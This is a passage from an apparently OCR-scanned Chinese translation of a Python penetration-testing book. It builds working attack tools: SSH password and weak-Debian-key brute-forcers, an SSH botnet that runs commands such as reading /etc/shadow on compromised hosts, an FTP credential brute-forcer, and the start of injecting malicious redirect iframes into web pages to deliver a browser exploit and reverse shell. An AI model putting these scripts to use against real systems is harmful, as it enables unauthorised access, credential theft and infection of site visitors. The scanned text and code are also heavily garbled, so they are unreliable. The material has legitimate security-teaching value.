火 墙 应 该 是 已 经 过 滤 掉 对 TCP 1720 端口 的 访问 请 求 。 按 照 我 们 最 初 的 想法 ， 这 个 端口 不 一 定 
关闭 。 可 见 ， 使 用 了 像 Nmap 这 样 功能 齐全 的 扫描 器 ， 我 们 就 能 够 发 现 过 滤器 ， 而 单一 的 
TCP 连接 扫描 是 做 不 到 这 一 点 的 。 

attacker:!# python nmapScan. py -H 10. 50. 60.125--p.21, 1720 


[*] 10.50.60.125 tcp/21 open 
[*] 10.50.60.125 tcp/1720 filtered 


FaPython#4#2—TSSHfEF Ws 


我 们 已 经 创建 了 一 个 用 来 搜寻 目标 的 端口 扫描 程序 ， 现 在 可 以 开始 利用 这 些 服务 中 的 漏 
WT. Morris 蠕虫 有 三 种 攻击 方式 ， 其 中 之 一 就 是 用 常见 的 用 户 名 和 密码 尝试 登录 RSH 服务 
(remote shell) . RSH 是 1988 年 问世 的 ， 它 为 系统 管理 员 提 供 了 一 种 很 棒 的 (尽管 不 安全 ) 
远程 连接 一 台 机 器 ， 并 能 在 主机 上 运行 一 系列 终端 命令 对 它 进行 管理 的 方法 。 

后 来 人 们 在 RSH 中 增加 一 个 公 钥 加 密 算法 ， 以 保护 其 经 过 网 络 传递 的 数据 ， 这 就 是 SSH 
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At 


Ha 


Received From: violentPython->/var/log/auth.log 

Rule: 5712 fired (level 10) -> "SSHD brute force trying 
to the system." 

Portion of the log(s): 


Oct 13: 23730230 
7.228 . 3458 
Oct’ 13--23:30329 
67.228.3.58 


Oct. 13-23% 30329 


67.228.3.58 
Oct 13 23:30:28 
67.228.3.58. 
Oct 13 23:30:28 
67.228.3.58 
Oct 13°233 30:27 
67.228.3.58 
Oct 13 23:30:27 
67.228.3.58 


violentPython 
violentPython 
violentPython 
violentPython 
violentPython 
violentPython 


violentPython 


用 Pexpect 与 SSH 交 互 


sshd[10956]: 
sshd[10954] : 
sshd[10952]: 
sshd[10950]: 
sshd{10948) : 


sshd[10946]: 


sshd[10944]: 


Invalid 


Invalid 


Invalid 


Invalid 
Invalid 
Invalid 


Invalid 


= 
2s 


user 


user 


user 


user 


user 


user 


user 


用 Python 进行 渗 


Ain. 


(Secure Shell) 协议 ， 最 终 SSH 取代 了 RSH。 不 过 ， 对 于 防范 用 常见 用 户 名 和 密码 尝试 暴力 
登录 的 攻击 方法 ， 这 并 不 能 起 到 多 大 的 作用 。SSH 蠕虫 已 经 被 证 明 是 非常 成 功 的 和 常见 的 攻 
击 方式 。 看 一 下 我 们 自己 的 网 站 (www.violentpython.org)〉 的 入 侵 检 测 系统 (IDS) 日 志 中 最 
近 的 SSH 攻击 记录 ， 我 们 看 到 : 攻击 者 试图 使 用 用 户 名 ucla, oxford 和 matrix 登录 系统 。 被 
选用 的 这 些 用 户 名 很 有 意思 。 对 我 们 来 说 幸运 的 是 : 在 注意 到 该 远程 IP 地 址 正 试图 暴力 生成 
可 能 的 密码 后 ，IDS 阻 断 了 该 IP 继续 尝试 登录 SSH 的 企图 。 


to get access 


ucla from 
ucla from 
oxford from 
oxford from 
oxford from 
matrix from 


matrix from 


现在 ， 让 我 们 来 实现 我 们 自己 的 能 暴力 破解 特定 目标 用 户 名 /密码 的 SSH 晴 虫 。 因 为 SSH 


attacker$ ssh root@127.0.0.1 
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. 
RSA key fingerprint is 5b:bd:af:d6:0c:af:98:1c:1la:82:5c:fc:5c:39:a3:68. 


客户 端 需要 用 户 与 之 进行 交互 ， 我 们 的 脚本 必须 在 发 送 进一步 的 输入 命令 之 前 等 待 并 “ 理 
解 ” 屏 幕 输出 的 意义 。 请 考虑 以 下 情形 : 要 连接 我 们 架 在 IP 地 址 127.0.0.1 上 SSH 的 机 器 ， 

应 用 程序 首先 会 要 求 我 们 确认 RSA 密 钥 指 纹 。 这 时 我 们 必须 回答 “是 ”， 然 后 才能 继续 。 接 
下 来 ， 在 给 我 们 一 个 命令 提示 符 之 前 ， 应 用 程序 要 求 我 们 输入 密码 。 最 后 ， 我 们 还 要 执行 
uname-v 命令 来 确定 目标 机 器 上 系统 内 核 的 版 本 。 
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为 了 能 自动 完成 上 述 控制 台 交 互 过 程 ， 我 们 需要 使 用 一 个 第 三 方 Python 模块 一 一 Pexpect 
(可 以 至 http://pexpect.sourceforge.net 中 下 载 该 模块 ) 。Pexpect 能 够 实现 与 程序 交互 、 等 待 预 
期 的 屏幕 输出 ， 并 据 此 做 出 不 同 的 响应 。 这 使 得 它 成 为 自动 暴力 破解 SSH 用 户口 令 程序 的 首 
选 工具 。 

检测 connect() 函 数 。 该 函数 接收 的 参数 包括 一 个 用 户 名 、 主 机 名 和 密码 ， 返 回 的 是 以 此 
进行 的 SSH 连接 的 结果 。 然 后 ， 利 用 pexpect 库 ， 我 们 的 程序 等 待 一 个 “可 以 预计 到 的 ” 输 
出 。 可 能 会 出 现 三 种 可 能 的 输出 : 超时 、 表示 主机 已 使 用 一 个 新 的 公 钥 的 消息 和 要 求 输入 密 
码 的 提示 。 如 果 出 现 超时 ， 那 么 session.expect0 返 回 零 。 用 下 面 的 让 语句 会 识别 出 这 一 情况 ， 
打印 一 个 错误 消息 后 返回 。 如 果 child.expect() 方 法 捕获 了 ssh_newkey 消息 ， 它 会 返回 一 个 
1， 这 会 使 函数 发 送 一 个 “yes” 消 息 ， 以 接收 新 的 密 钥 。 之 后 ， 函 数 等 待 密码 提示 ， 然 后 发 
送 SSH 密码 。 
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第 2 章 用 Python 进行 渗透 测试 


一 旦 通过 验证 ， 我 们 就 可 以 使 用 一 个 单独 的 command) MAE SSH 会 话 中 发 送 命令 。 
command() 函 数 需要 接收 的 参数 是 一 个 SSH 会 话 和 命令 字符 串 。 然 后 ， 它 同 会 话 发 送 命 令 字 
符 串 ， 并 等 待命 令 提 示 符 再 次 出 现 。 在 获得 命令 提示 符 后， 该 函数 把 从 SSH 会 话 那里 得 到 的 
结果 打印 出 来 。 
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| or m mT À i Nn r aiff i War 
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一 一 


把 所 有 的 这 些 打包 在 一 起 ， 我 们 就 有 了 一 个 可 以 模拟 人 的 交互 行为 的 连接 和 控制 SSH 会 
话 的 脚本 。 
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运行 该 脚本 ， 就 可 以 连接 到 SSH 服务 器 并 远程 控制 该 主机 。 我 们 可 以 运行 一 条 简单 的 命 
令 来 显示 存放 在 /etc/shadow 文件 中 root 用 户 的 密码 hash， 还 可 以 使 用 该 工具 做 一 些 更 促 狭 的 
事 一 一 比如 用 wget 下 载 一 个 post exploitation 工具 包 。 你 可 以 在 Backtrack 系统 中 生成 ssh-key 
并 启动 SSH 服务 的 方式 ， 启 动 一 个 SSH 服务 器 。 尝 试 启动 SSH 服务 ， 并 用 下 面 这 个 脚本 连 
接 它 。 





用 Pxssh 暴 力 破 解 SSH 密 码 


尽管 上 面 这 个 脚本 让 我 们 对 pexpect 的 能 力 有 了 深刻 的 理解 ， 但 我 们 还 可 以 用 Pxssh 进 一 
步 简化 它 。Pxssh 是 一 个 包含 了 pexpect 库 的 专用 脚本 ， 它 能 用 预先 写 好 的 login0、logoutO 和 
prompt0 等 函数 直接 与 SSH 进行 交互 。 使 用 Pxssh 可 以 将 上 面 这 个 脚本 简化 成 下 面 的 样子 : 


é - a = 


` 





= Sk xy her ‘~ 
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def connect (host, user, password): 
try: 
s =pxssh.pxssh() 
s.login(host, user, password) 
return s 
except: 
print '[-] Error Connecting ' 
exit (0) 
s =connect ('127.0.0.1', '‘root', ‘toor') 
send command(s, ‘cat /etc/shadow | grep root') 


我 们 的 脚本 快 完 工 了 ， 只 要 再 做 些小 的 修改 就 能 使 脚本 自动 执行 暴力 破解 SSH 口令 的 任 
务 。 除 增加 了 一 些 参数 解析 代码 来 读 取 主机 名 、 用 户 名 和 存 有 待 尝试 的 密码 的 文件 外 ， 我 们 
只 需 对 connect0 函 数 稍 做 修改 。 如 果 login(0) 函 数 执 行 成 功 ， 并 且 没 有 抛 出 异常 ， 我 们 将 打印 
一 个 消息 ， 表 明 密 码 已 被 找到 ， 并 把 表示 密码 已 被 找到 的 全 局 布尔 值 设 为 tues BW, RIIK 
捕获 该 异常 。 如 果 异 常 显示 密码 被 拒绝 ， 我 们 知道 这 个 密码 不 对 ， 让 函数 返回 即 可 。 但 是 ， 
如 果 异 常 显 示 socket 为 “read_nonblocking”， 可 能 是 SSH 服务 器 被 大 量 的 连接 刷 爆 了 ， 可 以 
稍 等 片刻 后 用 相同 的 密码 再 试 一 次 。 此 外 ， 如 果 该 异常 显示 pxssh 命令 提示 符 提取 困难 ， 也 应 
等 待 一 会 儿 ， 然 后 让 它 再 试 一 次 。 请 注意 ， 在 connect() 函 数 的 参数 里 有 一 个 布尔 量 release. 
由 于 connect() 可 以 递归 地 调用 另 一 个 connect()， 我 们 必须 让 只 有 不 是 由 connect0 递 归 调 用 的 
connectO 函 数 才能 够 释放 connection lock 信号 。 


import pxssh 
import optparse 
import time 
from threading import * 
maxConnections =5 
connection lock = BoundedSemaphore (value=maxConnections) 
Found = False 
Fails =0 
def connect (host, user, password, release): 
global Found 
global Fails 
try: 
s =pxssh.pxssh () 
S.login(host, user, password) 
print '[+] Password Found: ' +password 
Found = True 
except Exception, e: 
if 'read_nonblocking’ in str(e): 
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暴力 破解 某 个 设备 的 SSH 密码 的 结果 如 下 。 有 趣 的 是 ， 找 到 的 密码 是 “alpine”， 这 是 
iPhone 设备 上 root 用 户 的 默认 密码 。2009 年 年 底 ， 曾 出 现 过 一 个 攻击 已 越狱 的 iPhone 的 SSH 
蠕虫 。 通 常 ， 当 设备 越狱 后 ， 用 户 会 在 iPhone 上 启用 一 个 OpenSSH 服务 。 虽 然 这 个 功能 对 部 
分 人 很 有 用 ,但 有 些 用 户 却 对 此 并 不 知晓 。iKee 蠕虫 利用 了 这 一 新 功能 ， 尝 试 使 用 默认 的 密 
码 登 录 设 备 。 不 过 ， 蠕 虫 的 作者 并 没有 打算 用 蠕虫 造成 任何 伤害 ， 他 们 只 是 把 手机 的 背景 改 
RSA “Kee 永远 不 会 放弃 你 ”的 Rick Astley 的 照片 。 





5 re ` 
i. r Sia 
- 


利用 SSH 中 的 弱 私 钥 


对 于 SSH 服务 器 ， 密 码 验 证 并 不 是 唯一 的 手段 。 除 此 之 外 ，SSH 还 能 使 用 公 钥 加 密 的 方 
式 进行 验证 。 在 使 用 这 一 验证 方法 时 ， 服 务 器 和 用 户 分 别 掌握 公 铀 和 私 钥 。 使 用 RSA 或 是 
DSA 算法 ， 服 务 器 能 生成 用 于 SSH 登录 的 密 钥 。 一 般 而 言 ， 这 是 一 种 非常 好 的 验证 方法 。 由 
于 能 够 生成 1024 位 、2048 位 ， 甚 至 是 4096 位 密 钥 ， 这 个 认证 过 程 就 很 难 像 刚 才 我 们 利用 弱 
口令 进行 暴力 破解 那样 被 破解 掉 。 

不 过 ，2006 年 Debian Linux 发 行 版 中 发 生 了 一 件 有 意思 的 事 。 软 件 自动 分 析 工 具 发 现 了 
一 行 已 被 开发 人 员 注 释 掉 的 代码 。 这 行 被 注释 掉 的 代码 用 来 确保 创建 SSH 密 钥 的 信息 量 足 够 
大 。 被 注释 掉 之 后 ， 密 钥 空 间 的 大 小 的 炉 值 降低 到 只 有 15 位 大 小 (Ahmad, 2008) 。 仅 仅 15 


2 Rick Astley， 英 国歌 手 ， 骚 灵 乐 队 主唱 。 著 名 单 曲 Never Gonna Give You Up 在 英国 、 美 国 、 澳 洲 、 
德国 等 15 个 国家 获得 排行 冠军 。 一 一 译 者 注 
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位 的 焙 意 味 着 不 论 是 哪 种 算法 和 密 钥 长 度 ， 可 能 的 密 钥 一 共 只 有 32767 个 。Rapid7 的 CSO 和 
首席 架构 师 HD Moore 在 两 小 时 内 生成 了 所 有 的 1024 位 和 2048 位 算法 的 可 能 的 密 钥 
(Moore, 2008) 。 而 且 ， 他 把 结果 放 到 http://digitaloffense.net/tools/debianopenssl/ 中 ， 使 大 家 
都 可 以 下 载 利 用 。 你 可 以 从 下 载 1024 位 所 有 可 能 的 密 钥 开始 ， 下 载 并 解压 出 这 些 密 钥 后 ， 把 
其 中 的 公 和 钥 全 部 删 掉 ， 因 为 我 们 测试 连接 时 只 用 其 中 的 私 钥 。 


attacker# wget http://digitaloffense.net/tools/debian-openssl/debian _ 
ssh dsa 1024 x86.tar.bz2 

--2012-06-30 22:06:32--http://digitaloffense.net/tools/debian-openssl/ 
debian ssh dsa 1024 x86.tar.bz2 

Resolving digitaloffense.net... 184.154.42.196, 2001:470:1£10:200::2 

Connecting to digitaloffense.net/184.154.42.196|:80... connected. 

HTTP request sent, awaiting response... 200 OK 

Length: 30493326 (29M) [application/x-bzip2] 

Saving to: 'debian_ ssh dsa 1024 x86.tar.bz2' 





> 
] 30,493,326 496K/s in 74s 
2012-06-30 22:07:47 (400 KB/s) - ‘debian ssh dsa 1024 x86.tar.bz2' 
saved [30493326/30493326] 
attacker# bunzip2 debian ssh dsa 1024 x86.tar.bz2 
attacker# tar -xf debian ssh dsa 1024 x86.tar 
attacker# cd dsa/1024/ 
attacker# ls 
00005b35764e0b2401la9dcbca5b6éb6b5~-1390 
00005b35764e0b2401la9dcbca5b6b6b5-1390.pub 
00058ed68259e603 98 6db2af4eca3d59-30286 
00058ed68259e603986db2af4eca3d59-30286.pub 
0008b2c4246b6d4acfd0b0778b76c353-29645 
0008b2c4246b6d4acfd0b0778b76c353-29645.pub 
000b168ba54c709c6523a220d9ebcad6f-18228 
000b168ba54c7c9c6523a2209ebcad6f-18228.pub 
000b69£08565ae3ec30 febde740ddeb7—-6849 
000b69f08565ae3ec30febde740ddeb7-6849.pub 
000e€2b9787661464fdccc6f1f4dba436-11263 
000€2b9787661464fdccc6f1£4dba436-11263.pub 
<..SNIPPED..> 
attacker# rm -rf dsa/1024/*.pub 


3 Rapid? 是 全 球 领 先 的 安全 风险 信息 解决 方案 提供 商 ，Rapid7 专门 提供 漏洞 管理 、 漏 洞 扫描 、 漏 洞 评 
估 和 渗透 测试 。 一 一 译 者 注 
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这 个 错误 在 两 年 之 后 才 被 一 个 安全 研究 员 发 现 。 结 果 ， 可 以 肯定 相当 多 的 服务 器 上 都 有 
这 个 有 漏洞 的 SSH 服务 。 如 果 我 们 能 创建 一 个 利用 此 漏洞 的 工具 就 太 棒 了 。 通 过 访问 密 钥 空 
间 ， 可 以 写 一 个 简短 的 Python 脚本 逐一 暴力 尝试 32767 个 可 能 的 钥匙 ， 以 此 来 登录 一 个 不 用 
密码 ， 而 是 使 用 公 钥 加 密 算 法 进行 认证 的 SSH 服务 器 。 事 实 上 ，Warcat 团队 确实 曾 写 过 这 样 
一 个 脚本 ， 并 在 milw0rm 贴吧 中 公布 了 发 现 的 这 个 漏洞 〈Exploit-DB 将 Warcat 团队 的 脚本 存 
档 在 http://www.exploit-db.com/exploits/5720/} ) 。 但 是 ， 我 们 还 是 要 使 用 暴力 破解 登录 口令 
时 使 用 的 pexpect 库 ， 写 一 个 我 们 自己 的 脚本 。 

测试 弱 密 钥 的 脚本 与 我 们 暴力 破解 密码 的 脚本 很 相似 。 在 使 用 密 钥 登录 SSH 时 ， 我 们 需 
要 键入 ssh user@host -i keyfile -o PasswordAuthentication=no 格式 的 一 条 命令 。 在 下 面 的 脚本 
中 ， 我 们 逐个 使 用 目录 中 事先 生成 的 密 钥 ， 尝 试 进行 连接 。 如 果 连 接 成 功 ， 我 们 会 把 密 钥 文 
件 的 名 称 打印 在 屏幕 上 。 另 外 ， 我 们 还 会 使 用 两 个 全 局 变量 : Stop 和 Fails. Fails 的 作用 是 计 
算 由 于 远程 主机 关闭 连接 导致 的 连接 失败 的 次 数 。 如 果 这 个 数字 大 于 5， 我 们 会 终止 我 们 的 肢 
本 。 如 果 我 们 的 扫描 触发 了 远程 IPS， 阻 止 了 我 们 的 连接 ， 那 么 我 们 也 没有 必要 再 继续 下 去 。 
Stop 全 局 变量 是 一 个 布尔 值 ， 它 能 使 我 们 知道 是 否 已 经 找到 一 个 密 钥 ， 如 果 是 ，main() 函 数 就 
不 用 再 去 启动 任何 新 的 连接 线程 。 


import pexpect 
import optparse 
import os 
from threading import * 
maxConnections =5 aS 
connection lock = BoundedSemaphore (value=maxConnections) 
Stop = False 
Fails =0 
def connect(user, host, keyfile, release): 
global Stop 
global Fails 
try: 
perm denied = ‘Permission denied' 
ssh_newkey =‘Are you sure you want to continue’ 
conn _ closed = ‘Connection closed by remote host' 
opt =" -o PasswordAuthentication=no' 
connStr ='ssh ' +user +\ 
(@* thost tsi *-+keytile + opt 
child =pexpect.spawn(connStr) ; 
ret =child.expect ([pexpect.TIMEOUT, perm denied, \ 
ssh newkey, conn_closed, '$', '#', ]) 
if ret —2: 
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找到 目标 后 测试 脚本 ， 我 们 看 到 : 已 经 能 访问 一 个 有 漏洞 的 系统 了 。 如 果 这 些 1024 位 密 
钥 不 起 作用 ， 那 么 把 2048 位 的 密 钥 也 下 载 来 试 试 。 





构建 SSH 伪 尸 网 络 


现在 我 们 已 经 演示 了 我 们 能 通过 SSH 控制 主机 ， 接 下 来 让 我 们 继续 同时 控制 多 台 主 机 。 
攻击 者 在 达成 恶意 目的 时 ， 通 常会 使 用 被 黑 掉 的 计算 机 群 。 我 们 称 之 为 僵尸 网 络 ， 因 为 被 黑 
掉 的 电脑 会 像 僵 尸 一 样 执行 指令 。 

为 构建 僵 己 网络， 我们 必须 引入 一 个 新 的 概念 一 一 类 。 类 的 概念 是 面向 编程 对 象 和 编程 
模型 的 基础 。 在 这 一 编程 模型 中 ， 我 们 会 把 各 个 对 象 和 它们 所 关联 的 方法 一 起 实例 化 。 在 我 
们 的 僵尸 网 络 中 ， 每 个 单独 的 僵尸 或 client 〈 客 户 端 ) 都 需要 有 能 连 上 某 台 肉 机 ， 并 把 命令 发 
送 给 肉 机 的 能 力 。 





4 或 者 按 国 内 流行 的 叫 法 称 之 为 “ 肉 机 ” 





译 者 注 。 
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我 们 来 看 一 下 生成 Client0 类 对 象 的 代码 。 为 了 构造 client 对 象 ， 需 要 主机 名 、 用 户 名 ， 
以 及 密码 或 密 钥 。 同 时 ， 这 个 类 还 要 包含 维持 与 肉 机 连接 所 需 的 方法 一 一 connect()、 
send_command() 和 alive()。 请 注意 ， 当 我 们 引用 属于 类 中 的 变量 时 ， 是 以 sef 后 接 变量 名 的 方 
式 表 示 它 的 。 为 了 构建 僵尸 网 络 ， 我 们 要 建立 一 个 名 为 botnet 的 全 局 数组 ， 其 中 记录 了 单个 
client 对 象 。 接 下 来 ， 我 们 要 编写 一 个 名 为 addClient0 的 方法 ， 它 的 输入 是 主机 名 、 用 户 和 密 


码 ， 并 以 此 实例 化 一 个 client 对 象 ， 并 把 它 添加 到 botnet 数组 里 。 接 下 来 的 botnetCommand() 
函数 只 要 一 个 参数 一 一 要 发 布 的 命令 。 这 个 函数 遍历 整个 数组 ， 把 命令 发 送 到 botnet 数组 中 
的 每 个 client E. 
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self.session.sendline (cmd) 
self.session.prompt () 
return self.session.before 
def botnetCommand (command) : 
for client in botNet: 
output =client.send_ command (command 
printet ix] Output from Ut client: host 
print: "Gr. N -eubedh HENNI 
def addClient (host, user, password): 
client =Client (host, user, password) 
botNet.append (client) 
botNet = [] 
aqccliene Tr CLO. I0 r ELOF "FOO toon") 
adavlient ETTO. 1t 10.120." "ODE poe") 
add tent (TIPO 5105 10.030% or "hoor" 
botnetCommand('uname -v') 
botnetCommand('cat /etc/issue") 


案例 解析 


志愿 僵尸 网 络 
黑客 组 织 “ 匿 名 者 ”经 常 使 用 志愿 僵尸 网 络 攻 击 他 们 的 对 手 。 为 使 成 员 具 备 攻 南 
的 能 力 ， 该 黑客 组 织 要 求 其 成 员 下 载 名 为 Low Orbit Ion Cannon (LOIC) HLA, ix 


样 匿名 者 的 成 员 就 可 以 作为 一 个 整体 ， 对 被 他 们 视 为 对 手 的 网 站 发 动 分 布 式 僵尸 网 络 
攻击 。 匿 名 者 的 群体 行为 虽说 可 能 是 非法 的 ， 但 还 是 有 一 些 显 著 的 和 道义 上 的 胜利 成 
果 。 在 最 近 的 一 次 名 为 "操作 # 瞳 网 "的 行动 中 ， 匿 名 者 组 织 其 志愿 僵尸 网 络 黑 掉 了 一 个 
专门 散布 儿童 色情 内 容 网 站 的 主机 资源 。 





把 所 有 的 东西 合 在 一 起 ， 我 们 就 完成 了 SSH 僵尸 网 络 的 脚本 。 这 是 一 种 批量 控制 目标 的 
极 好 方法 。 在 测试 时 ， 我 们 先 制作 当前 Backtrack 5 虚拟 机 的 三 个 副本 ， 并 运行 它们 。 我 们 看 
到 ， 脚 本 遍历 了 这 三 个 主机 ， 同 时 间 所 有 的 肉 机 发 出 命令 。 不 过 这 个 SSH 僵尸 网 络 的 创建 脚 
本 是 直接 攻击 服务 器 的 ， 而 在 下 一 节 中 ， 将 专门 讨论 一 种 间接 攻击 普通 PC 客户 端的 方式 一 一 
利用 有 漏洞 的 服务 器 ， 再 加 上 男 一 种 攻击 方法 ， 批 量 抓 取 “ 肉 机 ”。 

attacker:!# python botNet.py 

[*]) Output from 10-10 10s LLO 


[+] uname -yv 
#1 SMP Fri Feb 17 10:34:20 EST 2012 
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利用 FTP 与 Web 批 量 抓 “ 肉 机 


在 最 近 的 一 次 被 称 为 k985ytv 的 批量 入 侵 中 ， 攻 击 者 使 用 了 FTP 的 匿名 账户 和 偷 来 的 用 
户 名 /密码 获得 了 22400 个 不 同 站 点 的 控制 权 ， 并 在 536000 个 网 页 上 挂 了 马 〈Huang， 
2011) 。 利 用 获得 的 访问 权限 ， 攻 击 者 注入 了 一 段 JavaScript 代码 ， 将 正常 的 网 页 重 定向 到 乌 
克 兰 的 一 个 恶意 网 站 那里 。 一 旦 被 黑 掉 的 网 站 把 浏览 它 的 用 户 重 定向 到 乌克兰 的 那 台 恶意 主 
机 那里 之 后 ， 亚 意 主机 就 会 利用 浏览 器 中 的 漏洞 ， 安 装 假 的 用 来 窃取 用 户 信用 卡 信息 的 “ 防 
病毒 程序 ”。 这 次 k985ytv 攻击 最 终 取得 了 巨大 的 成 功 。 在 下 一 节 中 ， 我 们 将 用 Python 重 现 
这 一 攻击 。 

通过 检查 被 黑 服务 器 的 FTP 上 日志， 我 们 可 以 清楚 地 看 到 发 生 了 什么 。 某 个 自动 执行 的 脚 
本 先 连接 到 目标 主机 ， 看 它 是 否 包 含 名 为 index.htm 的 默认 页 面 。 接 下 来 ， 攻 击 者 上 传 一 个 新 
的 含有 恶意 重 定向 脚本 的 index.htm。 被 黑 掉 的 服务 器 就 能 给 任何 一 台 访 问 其 网 页 的 有 漏洞 的 
浏览 器 种 木马 。 
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为 了 更 好 地 理解 这 种 攻击 中 最 开始 使 用 的 攻击 方法 ， 我 们 简单 介绍 一 下 FTP 的 特点 。 文 
件 传输 协议 FTP) 服务 允许 用 户 在 一 个 基于 TCP 的 网 络 主机 间 传 输 文件 。 通 常情 况 下 ， 用 
户 使 用 用 户 名 和 相应 的 密码 登录 FTP 服务 器 。 然 而 ， 一 些 FTP 服务 器 提供 匿名 登录 的 能 力 。 
在 这 种 情况 下 ， 用 户 输入 用 户 名 "anonymous"， 并 提交 一 个 电子 邮件 地 址 代替 密码 。 


用 Python 构建 匿名 FTP 扫 描 器 


从 安全 方面 考虑 ， 网 站 允许 匿名 FTP 访问 似乎 是 很 疯狂 的 做 法 。 然 而 ， 令 人 惊讶 的 是 许 
多 网 站 为 此 提供 的 正当 理由 却 是 : 匿名 FTP 访问 有 助 于 网 站 访问 软件 更 新 。 我 们 可 以 利用 
Python 中 的 ftplib 库 编 写 一 个 小 脚本 ， 确 定 一 个 服务 器 是 否 允 许 匿 名 登录 。anonLogin(0) 函 数 接 
收 的 参数 是 一 个 主机 名 ， 并 返回 一 个 布尔 值 来 描述 该 主机 是 不 是 提供 匿名 FTP 登录 。 具 体 的 
操作 过 程 是 ， 该 函数 尝试 建立 一 个 匿名 FTP 连接 。 如 果 成 功 ， 则 返回 “true”。 如 果 在 建立 连 
接 的 过 程 中 函数 抛 出 了 一 个 异常 ， 则 返回 “False”。 
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运行 代码 ， 我 们 看 到 一 个 允许 匿名 登录 FTP 的 有 漏洞 的 目标 。 


“attacker# Python anonLogin.py 
‘[*] 192.168.95.179 FTP Anonymous Logon Succeeded. 


使 用 Ftplib 暴 力 破解 FTP 用 户口 令 


虽然 匿名 访问 是 进入 系统 的 方式 之 一 ， 但 攻击 者 也 能 成 功 地 用 偷 来 的 用 户 名 /密码 访问 合 
法 的 FTP 服务 器 。FileZilla 之 类 的 FTP 客户 端 程序 往往 将 密码 以 明文 形式 存储 在 配置 文件 中 
(Huang, 2011) 。 在 默认 位 置 中 存储 明文 密码 使 得 专门 为 此 编写 的 恶意 软件 能 够 迅速 田 取 用 
户 名 /密码 。 安 全 专家 们 在 近期 发 现 的 恶意 软件 中 也 发 现 了 窃取 FIP 密码 的 功能 。 更 有 甚 者 ， 
HD Moore 将 一 个 名 为 get filezilla_creds.rb 的 脚本 也 集成 在 了 新 发 布 的 Metasploit 中 ， 人 允许 用 
户 在 获得 目标 控制 权 后 可 以 快速 寻找 FTP 密码 。 如 果 我 们 要 暴力 破解 的 某 个 用 户 名 /密码 对 就 
在 一 个 文本 文件 里 会 怎么 样 呢 ? 为 了 演示 我 们 的 脚本 ， 我 们 假设 用 户 名 /密码 对 是 存储 在 一 
纯 文本 文件 中 的 。 

administrator:password 

admin:12345 

root:secret 

guest:guest 

i roeot steer 

现在 可 以 将 我 们 早期 的 anonLogin0) 函 数 扩展 创建 成 一 个 名 为 bruteLogin(0) 的 函数 。 这 个 函 
数 接收 的 参数 是 主机 名 和 含有 密码 的 文件 ， 返 回 一 个 能 登录 该 主机 的 用 户 名 /密码 。 请 注意 ， 
该 函数 逐个 读 取 文件 中 的 每 一 行 记 录 ， 用 户 名 和 密码 之 间 是 以 冒号 分 隔 的。 然后 函数 和 尝试 用 
这 个 用 户 名 和 密码 登录 FTP 服务 器 。 如 果 成 功 ， 则 返回 一 个 用 户 名 和 密码 的 tuple。 如 果 失 
败 ， 它 跳 过 该 异常 继续 到 下 一 行 。 如 果 函 数 穷尽 所 有 的 行 仍 未 能 成 功 登 录 ， 则 返回 一 个 值 为 
None、None 的 tuple。 

import ftplib 

def bruteLogin (hostname, passwdFile): 

pF =open(passwdFile, ‘r') 

for line in pF.readlines(): 

= userName =line.split(':') [0] 3 
passWord =line.split(':') ([1].strip('\r').strip('\n') 
print "[+] Trying: "tuserName+"/"+passWord 


try: 
ftp = ftplib.FTP (hostname) 
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通过 遍历 用 户 名 /密码 对 的 列表 后 ， 我 们 最 终 找到 了 一 个 有 效 的 用 户 名 /密码 对 : 
guest/guest. 





在 FTP 服 务 器 上 搜索 网 页 


有 了 FTP 服务 器 的 登录 口令 之 后 ， 我 们 现在 要 测试 一 下 该 服务 器 是 否 提供 Web 服务 。 为 
此 ， 我 们 首先 要 列 出 FTP 目录 中 的 所 有 文件 ， 搜 索 其 中 是 否 含有 默认 网 页 。returnDefault() 函 
数 输入 的 参数 是 一 个 FTP 连接 ， 返 回 一 个 它 找到 的 默认 网 页 的 数组 。 它 是 通过 发 出 NLST 命 
令 ( 这 是 列 出 目录 中 所 有 文件 的 命令 ) 完成 这 一 操作 的 。 该 函数 会 逐个 检查 NLST 命令 列 出 
的 每 个 文件 的 文件 名 是 不 是 默认 的 Web 页 面 文件 名 ， 并 把 找到 的 所 有 默认 网 页 都 添加 到 一 个 
叫 retList 的 数组 中 。 完 成 这 一 迭代 操作 后 ， 函 数 返 回 该 数组 。 
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分 析 了 这 个 有 漏洞 的 FTP 服务 器 后 ， 我 们 看 到 在 其 FTP 根 目 录 中 有 三 个 网 页 。 太 棒 了 ! 
这 下 我 们 就 可 以 继续 用 客户 端的 漏洞 利用 代码 感染 这 些 网 页 了 。 





在 网 页 中 加 入 恶意 注入 代码 


现在 ， 我 们 已 经 找到 了 网 页 文件 ， 我 们 必须 用 恶意 重 定向 代码 感染 它们 。 为 了 快速 创建 
一 个 位 于 http://10.10.10.112:8080/exploit 的 恶意 服务 器 和 页 面 ， 我 们 将 使 用 Metasploit 框架 。 
请 注意 ， 这 里 选用 的 是 ms10_002 aurora， 这 个 漏洞 利用 代码 与 当年 在 “极光 行动 ”中 用 来 对 
付 谷歌 的 漏洞 利用 代码 极为 相似 。10.10.10.112:8080/exploit 上 的 网 页 会 利用 被 重 定向 到 它 这 
里 的 浏览 器 中 的 漏洞 ， 使 之 向 我 们 提供 一 个 反 向 连接 ， 令 我 们 能 通过 这 个 反 向 连接 来 控制 这 
台 “ 肉 机 ”。 
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现在 如 果 有 哪个 有 漏洞 的 浏览 器 连接 到 http://10.10.10.112:8080/ exploit 这 个 服务 器 ， 它 就 
会 执行 漏洞 利用 代码 ， 成 为 我 们 的 猎物 。 一 旦 成 功 ， 它 将 生成 一 个 反 向 的 TCP shell， 并 让 我 
们 能 得 到 这 台 被 黑 掉 的 计算 机 上 的 Windows 命令 行 提示 窗口 。 有 了 这 个 命令 shell 后 ， 我 们 现 
在 就 能 在 “ 肉 机 ”上 以 管理 员 权 限 执 行 命令 了 。 
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接 下 来 ， 我 们 要 在 被 黑 服务 器 的 正常 网 页 中 添加 一 段 重 定向 至 我 们 的 恶意 服务 器 的 代 
码 。 要 做 到 这 一 点 ， 我 们 可 以 从 被 黑 的 服务 器 上 把 默认 网 页 下 载 下 来 ， 在 其 中 插入 一 个 
iframe， 然 后 把 这 个 插入 了 恶意 代码 的 网 页 传 回 到 被 黑 的 服务 器 上 。 我 们 来 看 一 下 injectPage() 
这 个 函数 。 我 们 需要 给 injectPage() 函 数 输入 一 个 FTP 连接 、 网 页 名 ， 以 及 表示 用 于 重 定 向 的 
